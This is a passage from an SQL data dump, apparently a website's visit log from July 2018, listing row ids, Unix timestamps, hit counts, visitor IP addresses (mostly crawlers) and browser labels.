),(276975,1532153145,1,1,0,0,'54.36.148.78','other'),(276976,1532153198,1,1,0,0,'54.36.149.61','other'),(276977,1532153408,1,1,0,0,'54.36.148.35','other'),(276978,1532153692,1,1,0,0,'54.36.149.35','other'),(276979,1532153767,1,1,0,0,'54.36.149.82','other'),(276980,1532154609,1,1,0,0,'54.36.148.214','other'),(276981,1532154734,1,1,0,0,'54.36.148.63','other'),(276982,1532154765,1,1,0,0,'66.249.75.157','chrome'),(276983,1532155033,1,1,0,0,'54.36.149.85','other'),(276984,1532155143,1,1,0,0,'178.154.171.88','other'),(276985,1532155404,1,1,0,0,'95.163.255.158','other'),(276986,1532155633,1,1,0,0,'216.244.66.241','other'),(276987,1532155720,1,1,0,0,'54.36.148.81','other'),(276988,1532156065,1,1,0,0,'180.76.15.146','other'),(276989,1532156099,1,1,0,0,'52.53.201.78','chrome'),(276990,1532156364,1,1,0,0,'54.36.148.131','other'),(276991,1532156659,1,1,0,0,'66.249.69.144','chrome'),(276992,1532156855,1,1,0,0,'54.36.148.153','other'),(276993,1532157358,1,1,0,0,'8.29.198.25','other'),(276994,1532157427,1,1,0,0,'40.77.167.204','other'),(276995,1532157562,1,1,0,0,'40.77.167.205','other'),(276996,1532157681,1,0,1,0,'66.249.69.143',''),(276997,1532157806,1,1,0,0,'77.111.247.10','chrome'),(276998,1532157999,1,1,0,0,'95.163.255.154','other'),(276999,1532158244,1,1,0,0,'54.36.148.25','other'),(277000,1532158259,1,0,1,0,'66.249.69.144',''),(277001,1532158272,1,1,0,0,'180.76.15.142','other'),(277002,1532158510,1,1,0,0,'40.77.167.205','other'),(277003,1532158772,1,1,0,0,'93.209.10.67','other'),(277004,1532158913,1,1,0,0,'54.36.149.59','other'),(277005,1532158983,1,1,0,0,'54.36.149.6','other'),(277006,1532159244,1,1,0,0,'54.36.149.89','other'),(277007,1532159478,1,1,0,0,'54.36.148.248','other'),(277008,1532159767,1,1,0,0,'54.36.148.199','other'),(277009,1532160298,1,1,0,0,'141.8.142.74','other'),(277010,1532160404,1,1,0,0,'216.244.66.241','other'),(277011,1532160451,1,1,0,0,'54.36.148.162','other'),(277012,1532160763,1,1,0,0,'54.36.148.55','other'),(277013,1532161036,1,1,0,0,'8.29.198.27','other'),(277014,1532161108,1,1,0,0,'199.58.86.209','other'),(277015,1532161113,1,1,0,0,'54.36.148.108','other'),(277016,1532161125,1,0,1,0,'66.249.69.144',''),(277017,1532161330,1,1,0,0,'54.36.148.21','other'),(277018,1532161741,1,1,0,0,'54.36.148.103','other'),(277019,1532161753,1,1,0,0,'54.36.148.63','other'),(277020,1532162223,23,23,0,0,'208.110.93.52','other'),(277021,1532162446,1,1,0,0,'178.154.171.88','other'),(277022,1532162587,1,1,0,0,'54.36.149.7','other'),(277023,1532162616,1,1,0,0,'216.244.66.241','other'),(277024,1532162763,1,1,0,0,'54.36.148.245','other'),(277025,1532162855,1,1,0,0,'54.36.148.250','other'),(277026,1532163284,1,1,0,0,'54.36.148.163','other'),(277027,1532163413,1,1,0,0,'40.77.167.202','other'),(277028,1532163586,1,1,0,0,'216.244.66.241','other'),(277029,1532163591,1,1,0,0,'54.36.148.103','other'),(277030,1532163698,1,1,0,0,'54.36.148.180','other'),(277031,1532164138,1,1,0,0,'54.36.148.70','other'),(277032,1532164709,1,1,0,0,'54.36.149.5','other'),(277033,1532164936,1,0,1,0,'66.249.75.155',''),(277034,1532165086,1,1,0,0,'54.36.149.4','other'),(277035,1532165156,1,0,1,0,'66.249.69.143',''),(277036,1532165890,2,2,0,0,'54.36.148.68','other'),(277037,1532167398,1,1,0,0,'40.77.167.202','other'),(277038,1532167624,1,1,0,0,'54.36.148.192','other'),(277039,1532167671,1,1,0,0,'216.244.66.241','other'),(277040,1532167697,1,1,0,0,'54.36.148.17','other'),(277041,1532168208,1,1,0,0,'8.29.198.26','other'),(277042,1532168669,1,1,0,0,'54.36.148.26','other'),(277043,1532168698,1,1,0,0,'54.36.149.9','other'),(277044,1532168880,1,1,0,0,'54.36.148.209','other'),(277045,1532169065,1,1,0,0,'40.77.167.204','other'),(277046,1532169142,1,1,0,0,'54.36.149.31','other'),(277047,1532169191,1,1,0,0,'54.36.148.80','other'),(277048,1532169453,1,1,0,0,'54.36.148.47','other'),(277049,1532169893,1,1,0,0,'54.36.149.68','other'),(277050,1532170251,1,1,0,0,'95.163.255.166','other'),(277051,1532170336,1,1,0,0,'54.36.148.255','other'),(277052,1532170776,1,1,0,0,'54.36.148.96','other'),(277053,1532171359,1,1,0,0,'144.76.166.14','other'),(277054,1532171457,1,1,0,0,'54.36.148.187','other'),(277055,1532171540,2,2,0,0,'54.36.149.47','other'),(277056,1532171633,1,1,0,0,'54.36.148.89','other'),(277057,1532171800,1,1,0,0,'141.8.142.74','other'),(277058,1532171872,1,1,0,0,'8.29.198.26','other'),(277059,1532172174,1,1,0,0,'54.36.148.227','other'),(277060,1532172363,1,1,0,0,'54.36.148.157','other'),(277061,1532172866,1,1,0,0,'54.36.148.95','other'),(277062,1532173318,1,1,0,0,'54.36.148.78','other'),(277063,1532173398,1,1,0,0,'216.244.66.241','other'),(277064,1532173451,1,1,0,0,'54.36.149.50','other'),(277065,1532173969,1,1,0,0,'54.36.149.90','other'),(277066,1532174131,1,1,0,0,'95.163.255.92','other'),(277067,1532174687,1,1,0,0,'54.36.149.66','other'),(277068,1532174775,1,1,0,0,'54.36.149.86','other'),(277069,1532174809,1,1,0,0,'54.36.148.177','other'),(277070,1532175016,1,1,0,0,'54.36.148.163','other'),(277071,1532175043,1,1,0,0,'216.244.66.241','other'),(277072,1532175163,1,1,0,0,'91.209.11.236','other'),(277073,1532175271,2,2,0,0,'54.36.149.52','other'),(277074,1532176184,1,1,0,0,'95.163.255.189','other'),(277075,1532176402,1,1,0,0,'54.36.148.251','other'),(277076,1532176488,1,1,0,0,'54.36.148.35','other'),(277077,1532177312,1,1,0,0,'54.36.148.91','other'),(277078,1532177432,1,1,0,0,'141.8.142.74','other'),(277079,1532177586,1,1,0,0,'54.165.59.7','other'),(277080,1532177610,1,0,1,0,'66.249.75.153',''),(277081,1532177697,1,1,0,0,'54.36.148.176','other'),(277082,1532177959,1,1,0,0,'95.163.255.158','other'),(277083,1532177985,1,1,0,0,'54.36.149.96','other'),(277084,1532178015,1,1,0,0,'54.36.148.23','other'),(277085,1532178353,1,1,0,0,'207.46.13.25','other'),(277086,1532178368,1,1,0,0,'54.36.148.185','other'),(277087,1532178673,1,1,0,0,'180.76.15.5','other'),(277088,1532178815,1,1,0,0,'54.36.149.59','other'),(277089,1532179053,1,1,0,0,'8.29.198.25','other'),(277090,1532179904,1,1,0,0,'54.36.149.95','other'),(277091,1532179944,1,1,0,0,'54.36.148.59','other'),(277092,1532180167,1,1,0,0,'54.36.149.86','other'),(277093,1532180315,1,1,0,0,'54.36.148.23','other'),(277094,1532180466,1,1,0,0,'54.36.148.137','other'),(277095,1532181024,1,1,0,0,'178.154.171.88','other'),(277096,1532181262,1,1,0,0,'54.36.148.246','other'),(277097,1532181748,1,1,0,0,'54.36.148.182','other'),(277098,1532182143,1,1,0,0,'54.36.148.251','other'),(277099,1532182295,1,1,0,0,'54.165.59.7','other'),(277100,1532182618,2,2,0,0,'207.46.13.25','other'),(277101,1532182713,1,1,0,0,'8.29.198.27','other'),(277102,1532182742,1,1,0,0,'95.163.255.94','other'),(277103,1532182800,1,1,0,0,'54.36.148.63','other'),(277104,1532182936,1,1,0,0,'54.36.148.229','other'),(277105,1532182991,1,1,0,0,'54.36.148.100','other'),(277106,1532183092,1,1,0,0,'218.66.74.176','other'),(277107,1532183184,1,1,0,0,'54.36.149.31','other'),(277108,1532183233,1,1,0,0,'54.36.149.86','other'),(277109,1532183614,1,1,0,0,'54.36.148.232','other'),(277110,1532183807,1,0,1,0,'66.249.75.155',''),(277111,1532183834,3,3,0,0,'216.244.66.241','other'),(277112,1532184057,1,1,0,0,'54.36.148.222','other'),(277113,1532184536,1,1,0,0,'94.178.238.102','chrome'),(277114,1532185068,1,1,0,0,'54.36.148.95','other'),(277115,1532185513,1,1,0,0,'54.36.148.123','other'),(277116,1532185515,1,1,0,0,'13.66.205.121','other'),(277117,1532185519,1,1,0,0,'54.36.148.179','other'),(277118,1532185606,1,1,0,0,'54.36.148.176','other'),(277119,1532185673,1,1,0,0,'54.36.149.103','other'),(277120,1532186261,1,1,0,0,'54.36.148.127','other'),(277121,1532186306,1,1,0,0,'141.8.142.74','other'),(277122,1532186483,1,1,0,0,'54.36.148.16','other'),(277123,1532187329,2,2,0,0,'216.244.66.241','other'),(277124,1532187360,1,1,0,0,'54.36.149.65','other'),(277125,1532187672,1,1,0,0,'54.36.149.107','other'),(277126,1532187755,1,1,0,0,'54.36.149.70','other'),(277127,1532188561,2,2,0,0,'216.244.66.241','other'),(277128,1532188819,1,1,0,0,'54.36.148.79','other'),(277129,1532188966,1,1,0,0,'54.36.149.92','other'),(277130,1532189577,1,0,1,0,'66.249.69.143',''),(277131,1532189709,1,0,1,0,'66.249.75.157',''),(277132,1532189821,1,1,0,0,'141.8.142.74','other'),(277133,1532189841,2,2,0,0,'216.244.66.241','other'),(277134,1532189878,1,1,0,0,'91.196.178.91','firefox'),(277135,1532189888,1,1,0,0,'8.29.198.27','other'),(277136,1532190298,1,1,0,0,'54.36.148.15','other'),(277137,1532190335,1,1,0,0,'54.36.148.52','other'),(277138,1532190341,1,1,0,0,'54.36.148.225','other'),(277139,1532191429,1,1,0,0,'216.244.66.241','other'),(277140,1532191713,1,1,0,0,'54.36.148.199','other'),(277141,1532191937,1,1,0,0,'54.36.148.243','other'),(277142,1532192093,2,2,0,0,'141.8.142.74','other'),(277143,1532192139,1,1,0,0,'54.36.148.73','other'),(277144,1532192309,1,1,0,0,'54.36.148.114','other'),(277145,1532192401,1,1,0,0,'54.36.148.96','other'),(277146,1532192421,1,1,0,0,'216.244.66.241','other'),(277147,1532192575,1,1,0,0,'54.36.149.72','other'),(277148,1532192655,1,1,0,0,'54.36.149.83','other'),(277149,1532192733,20,20,0,0,'54.224.83.221','other'),(277150,1532192767,1,1,0,0,'54.36.149.107','other'),(277151,1532193014,1,1,0,0,'54.36.148.131','other'),(277152,1532193549,1,1,0,0,'8.29.198.26','other'),(277153,1532193658,33,33,0,0,'54.224.83.221','other'),(277154,1532193954,1,1,0,0,'54.36.148.166','other'),(277155,1532194028,1,1,0,0,'54.36.149.105','other'),(277156,1532194217,1,1,0,0,'54.36.148.162','other'),(277157,1532194234,1,1,0,0,'54.36.148.185','other'),(277158,1532194310,1,1,0,0,'95.163.255.172','other'),(277159,1532194579,23,23,0,0,'54.224.83.221','other'),(277160,1532194846,1,1,0,0,'54.36.148.59','other'),(277161,1532195038,1,1,0,0,'54.36.148.202','other'),(277162,1532195390,1,1,0,0,'54.36.148.172','other'),(277163,1532195498,6,6,0,0,'54.224.83.221','other'),(277164,1532195669,1,1,0,0,'54.36.149.37','other'),(277165,1532195844,1,1,0,0,'141.8.142.74','other'),(277166,1532195895,1,0,1,0,'66.249.69.143',''),(277167,1532195968,1,1,0,0,'54.36.148.202','other'),(277168,1532196014,1,1,0,0,'54.36.149.92','other'),(277169,1532196035,1,1,0,0,'54.36.148.25','other'),(277170,1532196177,2,2,0,0,'92.113.189.235','chrome'),(277171,1532196595,1,1,0,0,'54.36.148.220','other'),(277172,1532196969,1,1,0,0,'54.36.148.141','other'),(277173,1532197166,1,1,0,0,'54.36.148.159','other'),(277174,1532197347,2,2,0,0,'66.249.69.144','chrome'),(277175,1532197362,1,1,0,0,'91.196.178.189','chrome'),(277176,1532197407,1,1,0,0,'54.36.148.241','other'),(277177,1532197488,1,1,0,0,'54.36.149.5','other'),(277178,1532197700,1,0,1,0,'66.249.69.143',''),(277179,1532198083,1,1,0,0,'54.36.149.71','other'),(277180,1532198807,1,1,0,0,'54.36.149.98','other'),(277181,1532198813,1,1,0,0,'13.66.205.121','other'),(277182,1532198905,1,1,0,0,'54.36.148.165','other'),(277183,1532199313,1,1,0,0,'54.36.148.145','other'),(277184,1532199355,1,1,0,0,'54.36.148.43','other'),(277185,1532199369,1,1,0,0,'54.36.148.128','other'),(277186,1532199415,1,1,0,0,'95.163.255.92','other'),(277187,1532200282,1,1,0,0,'37.73.255.55','chrome'),(277188,1532200295,1,1,0,0,'141.8.142.74','other'),(277189,1532200505,1,1,0,0,'54.36.149.73','other'),(277190,1532200560,1,1,0,0,'54.36.149.53','other'),(277191,1532200648,1,1,0,0,'54.36.148.72','other'),(277192,1532200663,1,1,0,0,'54.36.148.179','other'),(277193,1532200737,1,1,0,0,'8.29.198.25','other'),(277194,1532200892,1,1,0,0,'54.36.148.85','other'),(277195,1532200961,1,1,0,0,'54.36.148.120','other'),(277196,1532201235,1,1,0,0,'54.36.149.7','other'),(277197,1532201380,1,1,0,0,'54.36.148.47','other'),(277198,1532201508,1,1,0,0,'54.36.148.50','other'),(277199,1532201798,1,1,0,0,'54.36.148.205','other'),(277200,1532201846,2,2,0,0,'207.46.13.25','other'),(277201,1532202179,1,1,0,0,'178.154.171.88','other'),(277202,1532202260,1,1,0,0,'54.36.148.238','other'),(277203,1532202281,1,1,0,0,'54.36.148.182','other'),(277204,1532202727,2,2,0,0,'54.36.148.209','other'),(277205,1532202976,1,1,0,0,'54.36.148.152','other'),(277206,1532203301,1,1,0,0,'207.46.13.25','other'),(277207,1532203538,1,1,0,0,'54.36.148.102','other'),(277208,1532203937,1,1,0,0,'194.44.197.84','chrome'),(277209,1532203967,1,1,0,0,'54.36.148.142','other'),(277210,1532204086,1,1,0,0,'54.36.148.34','other'),(277211,1532204386,1,1,0,0,'8.29.198.26','other'),(277212,1532204440,1,1,0,0,'54.36.149.32','other'),(277213,1532204615,1,1,0,0,'54.36.148.134','other'),(277214,1532205091,1,1,0,0,'54.36.148.233','other'),(277215,1532205532,1,1,0,0,'95.163.255.169','other'),(277216,1532205928,1,1,0,0,'54.36.148.132','other'),(277217,1532206485,1,1,0,0,'54.36.149.71','other'),(277218,1532206493,1,1,0,0,'54.36.148.239','other'),(277219,1532206718,1,1,0,0,'95.163.255.114','other'),(277220,1532206775,1,1,0,0,'54.36.149.93','other'),(277221,1532206963,1,1,0,0,'54.36.148.240','other'),(277222,1532207269,1,1,0,0,'216.244.66.241','other'),(277223,1532207428,1,1,0,0,'54.36.148.245','other'),(277224,1532207527,1,1,0,0,'178.238.233.160','firefox'),(277225,1532207539,1,1,0,0,'54.36.149.61','other'),(277226,1532207601,1,1,0,0,'54.36.149.102','other'),(277227,1532207650,1,1,0,0,'54.36.149.53','other'),(277228,1532208057,1,1,0,0,'66.249.69.143','chrome'),(277229,1532208353,1,1,0,0,'54.36.149.40','other'),(277230,1532208401,1,1,0,0,'54.36.148.134','other'),(277231,1532208559,1,1,0,0,'207.46.13.25','other'),(277232,1532208689,1,1,0,0,'54.36.148.45','other'),(277233,1532208778,1,1,0,0,'54.36.148.35','other'),(277234,1532208952,1,1,0,0,'54.36.148.67','other'),(277235,1532209143,1,1,0,0,'54.36.148.248','other'),(277236,1532209197,1,1,0,0,'185.48.56.184','other'),(277237,1532209300,1,1,0,0,'54.36.149.36','other'),(277238,1532209377,1,1,0,0,'54.36.149.96','other'),(277239,1532209424,1,1,0,0,'95.108.213.24','other'),(277240,1532209609,1,1,0,0,'54.36.149.39','other'),(277241,1532209696,1,1,0,0,'54.36.148.170','other'),(277242,1532209864,1,1,0,0,'216.244.66.241','other'),(277243,1532210028,1,1,0,0,'54.36.148.26','other'),(277244,1532210057,1,1,0,0,'54.36.148.190','other'),(277245,1532210208,1,1,0,0,'54.36.148.221','other'),(277246,1532210435,1,1,0,0,'54.36.148.27','other'),(277247,1532211097,1,1,0,0,'216.244.66.241','other'),(277248,1532211221,1,1,0,0,'54.36.148.117','other'),(277249,1532211573,1,1,0,0,'54.36.148.180','other'),(277250,1532211576,1,1,0,0,'8.29.198.27','other'),(277251,1532211774,1,1,0,0,'54.36.149.11','other'),(277252,1532211921,1,1,0,0,'54.36.149.89','other'),(277253,1532212136,1,1,0,0,'54.36.149.82','other'),(277254,1532212160,1,1,0,0,'54.36.148.186','other'),(277255,1532212469,1,1,0,0,'54.36.148.109','other'),(277256,1532212846,2,2,0,0,'216.244.66.241','other'),(277257,1532213354,1,1,0,0,'54.36.148.198','other'),(277258,1532213545,1,1,0,0,'54.36.148.75','other'),(277259,1532213563,1,1,0,0,'54.36.148.28','other'),(277260,1532213608,1,1,0,0,'54.36.148.151','other'),(277261,1532213664,1,1,0,0,'54.36.149.7','other'),(277262,1532214121,1,1,0,0,'54.36.148.212','other'),(277263,1532214370,1,1,0,0,'54.36.148.249','other'),(277264,1532214821,1,1,0,0,'54.36.148.226','other'),(277265,1532214867,1,1,0,0,'54.36.148.148','other'),(277266,1532214961,1,1,0,0,'54.36.149.65','other'),(277267,1532215030,1,1,0,0,'54.36.149.25','other'),(277268,1532215091,1,1,0,0,'54.36.149.81','other'),(277269,1532215093,1,1,0,0,'54.36.148.62','other'),(277270,1532215218,1,1,0,0,'8.29.198.25','other'),(277271,1532215237,1,1,0,0,'54.36.148.99','other'),(277272,1532215518,1,0,1,0,'66.249.69.145',''),(277273,1532215575,1,1,0,0,'54.36.148.185','other'),(277274,1532215686,1,1,0,0,'216.244.66.241','other'),(277275,1532215803,1,1,0,0,'180.76.15.144','other'),(277276,1532215902,1,1,0,0,'54.36.148.238','other'),(277277,1532216146,1,1,0,0,'54.36.149.68','other'),(277278,1532216871,1,1,0,0,'54.36.148.28','other'),(277279,1532216960,1,1,0,0,'54.36.148.80','other'),(277280,1532217531,1,1,0,0,'54.36.148.26','other'),(277281,1532217631,1,1,0,0,'87.250.224.85','other'),(277282,1532217784,1,1,0,0,'54.36.148.230','other'),(277283,1532217920,1,1,0,0,'216.244.66.241','other'),(277284,1532218321,1,1,0,0,'40.77.167.203','other'),(277285,1532218699,1,1,0,0,'54.36.148.16','other'),(277286,1532218990,1,1,0,0,'54.36.149.20','other'),(277287,1532219223,1,1,0,0,'54.36.149.86','other'),(277288,1532219329,1,1,0,0,'37.9.113.115','other'),(277289,1532219347,1,1,0,0,'54.36.149.57','other'),(277290,1532219961,1,1,0,0,'54.36.148.85','other'),(277291,1532220039,1,1,0,0,'54.36.148.23','other'),(277292,1532220111,1,1,0,0,'95.163.255.159','other'),(277293,1532220114,1,1,0,0,'54.36.148.133','other'),(277294,1532220548,1,1,0,0,'40.77.167.204','other'),(277295,1532220702,1,1,0,0,'66.249.69.143','chrome'),(277296,1532220810,1,1,0,0,'216.244.66.241','other'),(277297,1532221606,1,1,0,0,'54.36.148.184','other'),(277298,1532221649,1,1,0,0,'95.163.255.180','other'),(277299,1532221654,1,1,0,0,'178.154.200.73','other'),(277300,1532222404,1,1,0,0,'8.29.198.27','other'),(277301,1532222578,2,0,2,0,'66.249.75.157',''),(277302,1532222598,1,1,0,0,'66.249.69.145','chrome'),(277303,1532222619,1,1,0,0,'54.36.148.81','other'),(277304,1532224097,1,1,0,0,'54.36.148.77','other'),(277305,1532224157,1,1,0,0,'54.36.148.249','other'),(277306,1532224295,1,1,0,0,'52.34.24.33','chrome'),(277307,1532224669,1,1,0,0,'54.36.148.157','other'),(277308,1532224711,1,1,0,0,'54.36.148.175','other'),(277309,1532224870,1,1,0,0,'54.36.148.149','other'),(277310,1532224929,1,1,0,0,'54.36.149.73','other'),(277311,1532224986,1,1,0,0,'54.36.149.61','other'),(277312,1532225183,1,1,0,0,'141.8.142.123','other'),(277313,1532225277,1,1,0,0,'178.154.171.88','other'),(277314,1532225356,1,1,0,0,'54.36.149.2','other'),(277315,1532225437,1,1,0,0,'54.36.148.210','other'),(277316,1532225764,1,1,0,0,'216.244.66.241','other'),(277317,1532226041,1,1,0,0,'8.29.198.25','other'),(277318,1532226293,1,1,0,0,'54.36.148.41','other'),(277319,1532226300,1,1,0,0,'54.36.149.45','other'),(277320,1532226444,1,1,0,0,'54.36.148.69','other'),(277321,1532226526,1,1,0,0,'54.36.148.17','other'),(277322,1532226613,1,1,0,0,'54.36.148.96','other'),(277323,1532226750,1,1,0,0,'216.244.66.241','other'),(277324,1532226774,1,1,0,0,'54.36.148.220','other'),(277325,1532226937,1,1,0,0,'178.154.200.41','other'),(277326,1532227034,1,1,0,0,'54.36.149.96','other'),(277327,1532227249,1,1,0,0,'54.36.149.102','other'),(277328,1532227461,1,1,0,0,'54.36.149.89','other'),(277329,1532228560,1,1,0,0,'54.36.149.45','other'),(277330,1532228570,42,42,0,0,'69.30.210.242','other'),(277331,1532228693,1,1,0,0,'54.36.148.198','other'),(277332,1532228717,2,2,0,0,'216.244.66.241','other'),(277333,1532228748,1,1,0,0,'54.36.148.104','other'),(277334,1532228750,1,1,0,0,'54.36.148.31','other'),(277335,1532229165,1,1,0,0,'54.36.148.49','other'),(277336,1532229194,1,1,0,0,'54.36.148.57','other'),(277337,1532229629,1,1,0,0,'54.36.149.56','other'),(277338,1532229637,1,1,0,0,'54.36.149.11','other'),(277339,1532229776,1,1,0,0,'54.36.149.72','other'),(277340,1532229885,2,0,2,0,'66.249.75.157',''),(277341,1532230298,4,4,0,0,'91.221.34.10','firefox'),(277342,1532230318,1,1,0,0,'54.36.148.150','other'),(277343,1532230354,1,1,0,0,'54.36.148.15','other'),(277344,1532230684,1,1,0,0,'40.77.167.204','other'),(277345,1532230800,1,1,0,0,'216.244.66.241','other'),(277346,1532231869,1,0,1,0,'66.249.75.155',''),(277347,1532232177,1,1,0,0,'178.154.171.55','other'),(277348,1532232179,1,1,0,0,'5.45.207.82','other'),(277349,1532232467,1,1,0,0,'54.36.148.187','other'),(277350,1532232512,1,1,0,0,'54.36.149.3','other'),(277351,1532232526,1,1,0,0,'54.36.148.172','other'),(277352,1532232652,1,1,0,0,'54.36.149.99','other'),(277353,1532233010,1,1,0,0,'54.36.148.212','other'),(277354,1532233011,1,0,1,0,'66.249.75.153',''),(277355,1532233204,1,1,0,0,'95.108.181.111','other'),(277356,1532233219,1,1,0,0,'207.46.13.25','other'),(277357,1532233241,1,1,0,0,'8.29.198.27','other'),(277358,1532233306,1,1,0,0,'95.163.255.165','other'),(277359,1532233935,1,1,0,0,'54.36.148.175','other'),(277360,1532234177,1,1,0,0,'54.36.148.150','other'),(277361,1532234997,1,1,0,0,'54.36.148.204','other'),(277362,1532235093,1,1,0,0,'54.36.148.109','other'),(277363,1532235123,1,1,0,0,'54.36.148.90','other'),(277364,1532235231,1,1,0,0,'54.36.148.207','other'),(277365,1532235453,1,1,0,0,'54.36.148.127','other'),(277366,1532235574,1,1,0,0,'54.36.148.187','other'),(277367,1532235582,1,1,0,0,'40.77.167.204','other'),(277368,1532235761,1,1,0,0,'54.36.148.154','other'),(277369,1532235855,1,0,1,0,'66.249.69.145',''),(277370,1532235901,2,2,0,0,'216.244.66.241','other'),(277371,1532236012,1,1,0,0,'54.36.148.126','other'),(277372,1532236332,1,1,0,0,'54.36.148.13','other'),(277373,1532236466,1,1,0,0,'95.163.255.98','other'),(277374,1532236529,1,1,0,0,'54.36.148.64','other'),(277375,1532236873,1,1,0,0,'8.29.198.25','other'),(277376,1532237074,2,2,0,0,'141.8.142.74','other'),(277377,1532237131,1,1,0,0,'178.154.171.88','other'),(277378,1532237308,1,1,0,0,'54.36.149.50','other'),(277379,1532237331,1,1,0,0,'54.36.149.11','other'),(277380,1532237478,1,1,0,0,'54.36.149.78','other'),(277381,1532237686,1,1,0,0,'66.249.69.144','chrome'),(277382,1532237846,1,1,0,0,'54.36.149.43','other'),(277383,1532237851,1,1,0,0,'54.36.148.203','other'),(277384,1532237909,1,1,0,0,'54.36.149.71','other'),(277385,1532237934,1,1,0,0,'54.36.148.43','other'),(277386,1532238056,1,0,1,0,'66.249.75.153',''),(277387,1532238159,1,1,0,0,'54.36.148.36','other'),(277388,1532238785,1,1,0,0,'54.36.148.33','other'),(277389,1532238859,1,1,0,0,'162.210.196.97','other'),(277390,1532239457,1,1,0,0,'54.36.149.53','other'),(277391,1532239472,1,1,0,0,'54.36.148.66','other'),(277392,1532239683,1,1,0,0,'54.36.148.163','other'),(277393,1532239723,1,1,0,0,'54.36.148.57','other'),(277394,1532239724,1,1,0,0,'54.36.149.61','other'),(277395,1532239799,2,2,0,0,'216.244.66.241','other'),(277396,1532239812,1,0,1,0,'66.249.75.157',''),(277397,1532239906,1,1,0,0,'54.36.148.249','other'),(277398,1532240347,1,1,0,0,'54.36.149.60','other'),(277399,1532241059,1,1,0,0,'54.36.149.63','other'),(277400,1532241202,2,2,0,0,'216.244.66.241','other'),(277401,1532241271,1,1,0,0,'54.36.148.182','other'),(277402,1532242047,1,1,0,0,'54.36.148.189','other'),(277403,1532242151,1,1,0,0,'54.36.149.38','other'),(277404,1532242208,1,1,0,0,'54.36.149.83','other'),(277405,1532242291,1,1,0,0,'54.36.149.44','other'),(277406,1532242849,1,1,0,0,'54.36.148.115','other'),(277407,1532242851,1,1,0,0,'54.36.149.106','other'),(277408,1532243027,1,1,0,0,'51.255.65.46','other'),(277409,1532243690,1,1,0,0,'87.250.224.96','other'),(277410,1532243893,1,1,0,0,'54.36.148.168','other'),(277411,1532244077,1,1,0,0,'95.163.255.172','other'),(277412,1532244089,1,1,0,0,'8.29.198.27','other'),(277413,1532244194,1,1,0,0,'54.36.149.50','other'),(277414,1532244302,1,1,0,0,'54.36.148.170','other'),(277415,1532244395,1,1,0,0,'54.36.148.39','other'),(277416,1532244583,1,1,0,0,'95.163.255.96','other'),(277417,1532245149,1,1,0,0,'5.3.152.69','chrome'),(277418,1532245690,1,1,0,0,'54.36.149.79','other'),(277419,1532245783,1,1,0,0,'54.36.148.199','other'),(277420,1532246000,1,0,1,0,'66.249.69.144',''),(277421,1532246618,1,1,0,0,'54.36.148.15','other'),(277422,1532246911,1,1,0,0,'54.36.148.204','other'),(277423,1532246972,1,1,0,0,'54.36.148.187','other'),(277424,1532247070,1,1,0,0,'54.36.148.128','other'),(277425,1532247114,1,1,0,0,'216.244.66.241','other'),(277426,1532247257,1,1,0,0,'54.36.149.3','other'),(277427,1532247654,1,1,0,0,'54.36.148.213','other'),(277428,1532247700,1,1,0,0,'8.29.198.25','other'),(277429,1532247782,1,1,0,0,'54.36.149.13','other'),(277430,1532247808,1,1,0,0,'178.154.171.88','other'),(277431,1532247899,1,1,0,0,'54.36.148.60','other'),(277432,1532247943,1,1,0,0,'54.36.148.43','other'),(277433,1532248170,1,1,0,0,'54.36.148.205','other'),(277434,1532248933,1,1,0,0,'54.36.148.213','other'),(277435,1532249338,1,1,0,0,'178.154.171.10','other'),(277436,1532249811,1,1,0,0,'54.36.149.90','other'),(277437,1532250184,1,1,0,0,'207.46.13.25','other'),(277438,1532250801,1,1,0,0,'54.36.148.50','other'),(277439,1532251146,1,1,0,0,'54.36.148.49','other'),(277440,1532251436,1,1,0,0,'54.36.149.96','other'),(277441,1532251452,1,1,0,0,'54.36.148.28','other'),(277442,1532251697,1,1,0,0,'54.36.148.84','other'),(277443,1532251935,1,0,1,0,'66.249.75.153',''),(277444,1532252579,1,1,0,0,'188.243.40.83','chrome'),(277445,1532252671,1,1,0,0,'54.36.149.10','other'),(277446,1532253039,1,1,0,0,'37.9.113.134','other'),(277447,1532253147,1,1,0,0,'54.36.148.90','other'),(277448,1532253357,1,1,0,0,'54.36.148.30','other'),(277449,1532253560,1,1,0,0,'95.163.255.98','other'),(277450,1532253589,1,1,0,0,'54.36.148.103','other'),(277451,1532253635,1,1,0,0,'54.36.148.152','other'),(277452,1532253706,2,2,0,0,'54.36.149.62','other'),(277453,1532254221,1,1,0,0,'158.69.26.144','other'),(277454,1532254242,1,1,0,0,'158.69.26.144','chrome'),(277455,1532254387,1,1,0,0,'54.36.148.27','other'),(277456,1532254442,1,1,0,0,'54.36.149.25','other'),(277457,1532254543,1,0,1,0,'66.249.69.145',''),(277458,1532254926,1,1,0,0,'8.29.198.27','other'),(277459,1532255076,1,1,0,0,'54.36.149.34','other'),(277460,1532255668,1,1,0,0,'40.77.167.202','other'),(277461,1532256209,1,1,0,0,'54.36.148.178','other'),(277462,1532256230,1,1,0,0,'54.36.148.216','other'),(277463,1532256265,1,1,0,0,'54.36.148.21','other'),(277464,1532256475,1,1,0,0,'54.36.149.18','other'),(277465,1532256727,1,1,0,0,'54.36.149.41','other'),(277466,1532256754,1,1,0,0,'54.36.148.210','other'),(277467,1532257590,2,2,0,0,'216.244.66.241','other'),(277468,1532258041,1,1,0,0,'54.36.148.131','other'),(277469,1532258231,1,1,0,0,'54.36.149.49','other'),(277470,1532258438,1,1,0,0,'54.36.149.97','other'),(277471,1532258471,1,1,0,0,'54.36.149.85','other'),(277472,1532258517,1,1,0,0,'54.36.148.50','other'),(277473,1532258525,1,1,0,0,'54.36.148.33','other'),(277474,1532258526,1,1,0,0,'8.29.198.25','other'),(277475,1532258718,1,1,0,0,'54.36.149.32','other'),(277476,1532258820,1,1,0,0,'141.8.132.22','other'),(277477,1532259675,1,1,0,0,'54.36.148.131','other'),(277478,1532259845,1,1,0,0,'54.36.149.92','other'),(277479,1532260292,5,5,0,0,'46.4.67.206','other'),(277480,1532260644,1,1,0,0,'54.36.148.250','other'),(277481,1532260930,2,2,0,0,'40.77.167.202','other'),(277482,1532260940,1,1,0,0,'40.77.167.203','other'),(277483,1532260965,2,2,0,0,'216.244.66.241','other'),(277484,1532261158,1,1,0,0,'54.36.149.4','other'),(277485,1532261317,1,1,0,0,'54.36.149.14','other'),(277486,1532261410,1,1,0,0,'54.36.148.193','other'),(277487,1532261907,1,1,0,0,'54.36.149.52','other'),(277488,1532262070,1,1,0,0,'54.36.148.163','other'),(277489,1532262179,1,1,0,0,'54.36.149.90','other'),(277490,1532262423,1,1,0,0,'54.36.148.204','other'),(277491,1532262455,1,1,0,